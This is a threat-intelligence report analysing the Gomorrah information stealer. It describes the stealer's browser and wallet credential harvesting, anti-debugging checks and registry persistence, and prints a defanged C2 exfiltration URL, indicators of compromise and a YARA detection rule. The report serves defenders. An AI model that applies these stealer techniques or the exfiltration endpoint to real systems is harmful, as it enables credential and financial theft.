Short Summary
The report from Cyfirma provides an in-depth analysis of the Gomorrah Stealer, a sophisticated information-stealing malware operating within a malware-as-a-service (MaaS) framework. It targets sensitive data from various applications, employing advanced evasion techniques and persistence strategies to maintain a foothold on infected systems. The report outlines the malware’s behavior, data collection methods, and its impact on cybersecurity.
Key Points
- Malware Type: Gomorrah Stealer is a potent information-stealing malware sold as a MaaS tool.
- Targeted Data: It extracts sensitive information from web browsers, cryptocurrency wallets, VPN clients, and messaging apps.
- Distribution: The malware is marketed and supported via Telegram channels.
- Technical Framework: Created using .NET with pure IL code, it utilizes Just-In-Time (JIT) compilation to evade static analysis.
- Persistence Mechanism: Establishes an autorun registry entry to ensure execution after system reboots.
- Data Exfiltration: Compresses and uploads stolen data to a command-and-control (C2) server, deleting local copies post-upload.
- Anti-Analysis Measures: Employs techniques to detect and terminate processes associated with security analysis or debugging.
- Threat Landscape: Reflects an evolving cybersecurity environment, emphasizing the need for continuous vigilance and adaptive defense strategies.
MITRE ATT&CK TTPs – created by AI
- T1592: Gather Victim Host Information
- Collects data about installed programs from the Windows registry.
- T1204.002: Malicious File
- Distributes malware through malicious files.
- T1622: Debugger Evasion
- Employs measures to detect debugging environments and terminate processes.
- T1497: Virtualization/Sandbox Evasion
- Checks for virtual environments to evade detection.
- T1140: Deobfuscate/Decode Files or Information
- Utilizes techniques to decode or deobfuscate information.
- T1083: File and Directory Discovery
- Enumerates directories to gather sensitive information.
- T1071.001: Web Protocols
- Uses web protocols for command and control communications.
- T1041: Exfiltration Over C2 Channel
- Exfiltrates data through a command-and-control channel.
Executive Summary
At Cyfirma, we are dedicated to providing current insights into prevalent threats and the strategies employed by malicious entities targeting both organizations and individuals. This report provides a comprehensive analysis of the Gomorrah Stealer, an information-stealing malware that operates within a malware-as-a-service (MaaS) framework and targets a range of sensitive data on infected systems. The stealer’s primary function is to extract and exfiltrate information, such as passwords, credit card details, and cookies from web browsers and other applications. This report will explore the stealer’s behavior, its methods of data collection and concealment, and the overall impact on affected systems, providing valuable insights into the malware’s functionality and persistence strategies.
Introduction
Gomorrah Stealer is a sophisticated malware, designed to exfiltrate sensitive information from compromised systems. It employs various evasion techniques and gathers data about the installed programs from the Windows registry, as well as collects additional information from web browsers, VPNs, cryptocurrency wallets, and configuration files.
For data concealment, the stealer compresses and uploads the collected information to a remote server, and subsequently deletes the local files to obscure its activities. To ensure persistence, it establishes an autorun mechanism that allows it to reactivate after a system reboot. The stealer also integrates anti-analysis measures to detect and terminate processes associated with security analysis or debugging environments. This report explores the stealer’s operational methods, data collection processes, and persistence strategies, offering a comprehensive overview of its impact and functionality.
Key Findings
- Gomorrah stealer is a potent malware, functioning as a malware-as-a-service (MaaS) tool, designed to covertly exfiltrate a wide range of sensitive data from compromised systems.
- It targets data from web browsers, cryptocurrency wallets, VPN clients, messaging apps, and FTP client data.
- This malware is sold through and supported via Telegram.
- Gomorrah Stealer is created using .NET with pure IL code and relies on Just-In-Time (JIT) compilation at runtime to execute its functionality, which provides a defense against static analysis.
- The malware employs anti-analysis measures by frequently checking for debugging or analysis environments.
- The malware establishes persistence by creating an Autorun registry entry, ensuring it executes automatically after the system reboots.
- Gomorrah stealer uploads stolen data to a command-and-control server (C2).
- The stealer compresses the collected data into a zip archive before uploading it to a remote server and deletes local files post-upload to hide its activities.
- It sends and receives updates and instructions from the C2 server.
ETLM Attribution
Gomorrah stealer is being sold on a Telegram channel which had 834 subscribers at the time of writing.
Telegram channel
In an old post, the threat actor mentions a website as the official website for the Gomorrah stealer:
Telegram post
https[:]//www[.]Gomorrah[.]pw was down at the time of writing, but the archived page shows the snippet of the website:
Archive page: Gomorrah[.]pw
The C2 identified in this study also reveals the login panel for its subscribers:
C2 login panel: https[:]//rougecommunications[.]org/webpanel/Panel/login[.]php
A recent change in the login panel captured by the CYFIRMA research team also indicates that the malware could be renamed (or new versions will be named “Lucifer”):
Change in the login panel
‘Lucifer’ is used by the threat actor as a malware name for the very first version of the malware released:
Telegram post: versions
An announcement has been made by the threat actor on their Telegram page about the upcoming version of the Gomorrah stealer (v5.5):
Telegram post: update announcement
The threat actor also has other social media pages to promote it, such as YouTube and Facebook:
YouTube channel
Facebook page
As per the older Telegram post, the name of the threat actor is ‘Lucifer’ which is also used for initial malware names. This is also seen on the Facebook page.
A Telegram post: Lucifer
Threat Landscape:
The landscape in which the Gomorrah Stealer has arisen reflects a rapidly evolving and increasingly complex environment. As a sophisticated piece of malware, Gomorrah Stealer leverages advanced techniques to evade detection and enhance its effectiveness. By utilizing a .NET-based pure Intermediate Language (IL) code and relying on JIT compilation, it effectively guards against static analysis, and recently the threat actor announced an upcoming version of the stealer with updated features, indicating ongoing development and refinement. This ongoing adaptability highlights the persistent challenges in cybersecurity and emphasizes the necessity for continuous vigilance and evolving defense strategies.
Analysis of Gomorrah Stealer
| File Analysis | |
| File Name | update_windows10.exe |
| File Size | 550.55 KB (563760 bytes) |
| Signed | Not signed |
| MD5 | e02089570b24b11d6350337069b7e823 |
| SHA-256 | 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4 |
| Compiler-Time Stamp | 01-07-2023 |
The primary specimen of the Gomorrah stealer is a 32-bit .NET executable which is protected using .NET Reactor to prevent the specimen from analysis/reverse engineering, and requires administrator privileges for execution:
The specimen is IL-only .NET code, meaning it consists solely of Intermediate Language (IL) and is compiled in native code by the .NET runtime upon execution. The only import in IAT (import address table) ‘_CorExeMain’ indicates that the executable is intended to run with the .NET runtime:
Import table
Reliance on pure IL code and having only one import in the IAT are effective anti-analysis measures against static-analysis techniques.
This executable consists of four sections, with the .text section comprising 96.90% of the file. It contains two executable files:
.text section
We extracted the executable files from the .text section, with the following details:
1. Newtonsoft.Json.dll
File Size: 382.35 KB
MD5: 201fb3d8b93205488e1a6a408ce18539
SHA256: 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1
2. Zip.exe
File Size: 30.85 KB
MD5: b479fa60615c730d0417b67c1a26274f
SHA256: dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c
Both the extracted files are .NET executables and have not been detected by security vendors.
The overlay section of the specimen contains the URL “http[:]//rougecommunications[.]org/webpanel”:
Overlay data
Behavioral & Code Analysis
1st Stage Execution:
Initially, the .NET runtime takes over the execution process by loading the necessary assemblies, initializing the Common Language Runtime (CLR), and setting up the execution environment for the .NET application.
After initialization, the WinHttpOpen function is called to initialize a WinHTTP session, and then the Winsock API send() is used to check the IP address information of the host machine:
Getting IP details
2nd Stage Execution:
At the second stage, the executable drops the DLL file “Newtonsoft.Json.dll” into the Temp directory of the current user (C:UsersuserAppDataLocalTemp):
Dropping DLL
This file is the one we extracted from the .text section of the executable. However, the file hash differs due to variations in the relocation section, typically indicating that the executables were compiled or linked with different base addresses, as well as differences in the overlay data that contains the certificate (signed file). It also drops the same DLL into the current working directory, such as the Desktop.
The dropped DLL, Newtonsoft.Json.dll, is a well-known .NET library distributed by Microsoft. It is widely used for handling JSON (JavaScript Object Notation) in .NET applications due to its efficiency and ease of use with C#, VB.NET, and other .NET languages.
Then, the executable moves itself from the current working directory (such as Desktop) to the Temp directory (C:UsersuserAppDataLocalTemp), while the executable process continues running.
This occurs because the running process is independent of the file’s physical location on the disk and relies on the file’s handle rather than its path. This allows the executable to be moved or deleted without affecting the ongoing process.
Moving/renaming malware executable
It also renames itself using the format update_YYDDHH, where YY represents the last two digits of the year, DD represents the day of the month, and HH represents the hour. For example, if the year is 2024, the day is the 10th, and the hour is 09, the executable would rename itself as update_240910.
3rd Stage Execution:
The specimen creates a directory under the user’s Temp directory (C:UsersuserAppDataLocalTemp). The directory name is based on the country code retrieved from the IP address details and the system time, which is obtained using the GetSystemTimeAsFileTime function:
Creating directory
It also creates subdirectories with names such as Browser and Files, where the stealer collects data from the compromised host:
Creating subdirectory
Creating subdirectory
4th Stage Execution: (Data Collection)
The stealer starts harvesting data from the host. It begins by collecting the data about the installed program on the host by reading the HKLMSOFTWAREMicrosoftWindowsCurrentVersionUninstall registry:
Reading installed program via uninstall registry
It writes the gathered details about the installed programs, such as program name, install date and version, to the ProgramList.txt file in the IN_1F8BFBFF000806C1 folder:
Logging gathered data
It then logs the list of running processes to the ProsessList.txt file (a typo by the threat actor 😊 in the file name):
Logging gathered data
The stealer enumerates the host for web browser data by attempting to read file attributes related to specific web browsers in the designated directories. It collects information such as login credentials, passwords, and cookies:
Enumerating system for browser data
The stealer also attempts to read the key used to encrypt stored passwords (such as in Firefox) and logs the unencrypted details:
Reading encryption key from Firefox
Logs decrypted data
It also collects data from other programs, such as VPNs, and cryptocurrency wallets:
Logging gathered data
The stealer also collects .ini files to gather a range of sensitive information, such as configuration settings, authentication details, and license keys:
Gathering .ini files
The system information such as PC name, processor, operating system version, antivirus, and firewall, is also collected by the stealer in the info.txt file:
Logging system information
Additionally, it takes screenshots and saves them as Screenshot.png in the IN_1F8BFBFF000806C1 folder:
Taking screenshots
Next, it drops zip.exe in the Temp folder. This file is one of those we extracted from the .text section of the executable. However, the file hash differs due to variations in the relocation section:
Dropping zip.exe in the Temp folder
Zip.exe is executed as the child process of the stealer:
Executing zip.exe
Zip.exe checks for the IP details of the host, loads the clrcompression.dll (for compression functionality), and compresses the folder IN_1F8BFBFF000806C1 as a zip archive:
Creating zip archive
The following applications and services are targeted by the Gomorrah stealer:
- Web Browsers: Opera, Edge, Mozilla Firefox, Google Chrome, Chromium, Yandex, Iridium, Epic, Sputnik, 7star, CentBrowser, Orbitum, Kometa, Torch, Amigo, Vivaldi, Chedot, Comodo Dragon, CocCoc Browser, Element Browser, Uran.
- Cryptocurrency & Wallets: Bitcoin, Armory, Electrum, Ethereum, Zcash, Dash, Monero.
- VPNs: Proton VPN, OpenVPN.
- Messaging: Outlook.
- FTP/File Management: FileZilla.
Exfiltration:
The malware process (update_windows10.exe) reads the compressed file IN_1F8BFBFF000806C1.zip, and the URI:
Reading zip archive
An unhandled exception occurred as “the URI format could not be determined”:
The stealer connects to the C2 server rougecommunications[.]org, sends details about the stolen data – such as passwords, credit card information, and cookies – via the URL, and uploads the compressed archive:
Data exfiltration URL:
http[:]//rougecommunications[.]org/webpanel//logs.php?hwid=IN1F8BFBFF000806C1&Passwords=*&CreditCards=*&Cookies=*&AutoFill=*&Wallets=*
After uploading the data to the C2, it deletes the files, including dropped executables and the compressed archive:
Deleting harvested data
Persistence:
For persistence, the Gomorrah stealer creates an Autorun registry entry, enabling the malware to execute after a system reboot:
Persistence using the Windows registry
Anti-Analysis:
Gomorrah stealer calls APIs, such as GetTickCount, GetSystemInfo frequently to detect and terminate the malware process if it identifies an analysis environment or Debugger:
It also calls IsProcessorFeaturePresent to verify the virtual environment:
Gomorrah-Stealer Capabilities
Analyzing the Gomorrah stealer offers important insights into its operational features. Based on this analysis, the following points highlight the capabilities of this information-stealing malware:
- Targets and steals a wide range of sensitive information, including web browser data, cryptocurrency wallet details, VPN client information, messaging app data, and FTP client data.
- Collects configuration settings, authentication information, and license keys from .ini files.
- Captures system information, such as PC name, processor details, operating system version, antivirus, and firewall settings.
- Creates Autorun registry entries to ensure automatic execution after system reboots.
- Creates and manages directories in the TEMP folder to store and organize harvested data.
- Detects debugger and analysis environment.
- Utilizes .NET-based pure IL code and JIT compilation to evade static analysis.
- Exfiltrate harvested data and send and receive updates and instructions from the C2 server.
Conclusion
The examination of the Gomorrah stealer reveals a sophisticated and versatile information-stealing malware that operates as a MaaS tool. Gomorrah Stealer represents an evolving threat in the cybersecurity landscape, demonstrating advanced capabilities and a high level of adaptability. Through its use of .NET-based pure IL code and JIT compilation, the stealer effectively evades static analysis and detection, showcasing its technical sophistication. Its persistence strategies, including the creation of Autorun registry entries and relocation of its executables, ensure that it maintains a foothold on compromised systems. The malware’s ability to collect and exfiltrate a wide range of sensitive information—from web browsers, cryptocurrency wallets, and configuration files to system details—illustrates its broad and potentially damaging impact.
Furthermore, Gomorrah Stealer’s distribution as MaaS through the Telegram channel highlights the commercial aspect of modern cyber threats, making sophisticated malware accessible to a wider audience. The threat actor’s announcement of an updated version with new features underscores the ongoing development and enhancement of the stealer, emphasizing the need for continuous vigilance in the face of evolving threats.
As threats like Gomorrah stealer continue to evolve, it is important for organizations to implement robust cybersecurity measures and proactive defense strategies to mitigate the associated risks. To reduce the threat of the Gomorrah stealer, users should exercise caution when opening files from untrusted sources or clicking on unfamiliar links, especially those promoting dubious software or content. Additionally, deploying strong cybersecurity practices – such as using reputable antivirus software, keeping all software up to date, and remaining vigilant against social engineering attacks – can significantly enhance protection against such sophisticated malware.
Indicators Of Compromise
| S/N | Indicators | Type | Context |
| 1 | e02089570b24b11d6350337069b7e823 | File | update_windows10.exe |
| 2 | 2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4 | File | update_windows10.exe |
| 3 | 201fb3d8b93205488e1a6a408ce18539 | File | Newtonsoft.Json.dll |
| 4 | 62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1 | File | Newtonsoft.Json.dll |
| 5 | b479fa60615c730d0417b67c1a26274f | File | Zip.exe |
| 6 | dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c | File | Zip.exe |
| 7 | 3afd64484a2a34fc34d1155747dd3847 | File | Zip.exe |
| 8 | bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9 | File | Zip.exe |
| 9 | rougecommunications[.]org | Domain | C2 |
| 10 | 172[.]93[.]223[.]99 | IP address | C2 |
| 11 | HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunWindows Defender Updater | Windows Registry | Persistence |
MITRE ATT&CK Tactics and Techniques
| No. | Tactic | Technique |
| 1 | Reconnaissance (TA0043) | T1592: Gather Victim Host Information |
| 2 | Execution (TA0002) | T1204.002: Malicious File |
| 4 | Defense Evasion (TA0005) | T1622: Debugger Evasion |
| T1497: Virtualization/Sandbox Evasion | ||
| T1140: Deobfuscate/Decode Files or Information | ||
| 5 | Discovery (TA0007) | T1622: Debugger Evasion |
| T1497: Virtualization/Sandbox Evasion | ||
| T1083: File and Directory Discovery | ||
| 6 | Command and Control (TA0011) | T1071.001: Web Protocols |
| 7 | Exfiltration (TA0010) | T1041: Exfiltration Over C2 Channel |
YARA Rules
rule Gomorrah Stealer Detection
{
meta:
description = “Detects Gomorrah stealer based on known IoCs”
author = Cyfirma Research
strings:
$md5_1 = “e02089570b24b11d6350337069b7e823”
$md5_2 = “201fb3d8b93205488e1a6a408ce18539”
$md5_3 = “b479fa60615c730d0417b67c1a26274f”
$md5_4 = “3afd64484a2a34fc34d1155747dd3847”
$sha256_1 = “2f8a79b12a7a989ac7e5f6ec65050036588a92e65aeb6841e08dc228ff0e21b4”
$sha256_2 = “62c6aebb6bcc4d2faf985a4af59b111ae1e162419acfae7e7f126189073bddf1”
$sha256_3 = “dc33943da400ea506484952ba242737460c73dd2b3e88c16f0f18a0fd6dc459c”
$sha256_4 = “bf78263914c6d3f84f825504536338fadd15868d788bf30d30613ca27abeb7a9”
$domain = “rougecommunications.org”
$registry = “HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunWindows Defender Updater”
condition:
any of ($md5_*) or any of ($sha256_*) or $domain or $registry
}
Recommendations
- Implement threat intelligence to proactively counter the threats associated with the Gomorrah stealer.
- To protect the endpoints, use robust endpoint security solutions for real-time monitoring and threat detection, such as Antimalware security suit and host-based intrusion prevention system.
- Continuous monitoring of the network activity with NIDS/NIPS and using the web application firewall to filter/block suspicious activity provides comprehensive protection from compromise due to encrypted payloads.
- Configure firewalls to block outbound communication to known malicious IP addresses and domains associated with the Gomorrah stealer command and control servers.
- Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
- Employ application whitelisting to allow only approved applications to run on endpoints, preventing the execution of unauthorized or malicious executables.
- Conducting vulnerability assessment and penetration testing on the environment periodically helps in hardening the security by finding the security loopholes followed by a remediation process.
- The use of security benchmarks to create baseline security procedures and organizational security policies is also recommended.
- Develop a comprehensive incident response plan that outlines steps to take in case of a malware infection, including isolating affected systems and notifying relevant stakeholders.
- Security awareness and training programs help protect from security incidents, such as social engineering attacks. Organizations should remain vigilant and continuously adapt their defenses to mitigate the evolving threats posed by the Gomorrah stealer malware.
- Update security patches which can reduce the risk of potential compromise.
Source: Original Post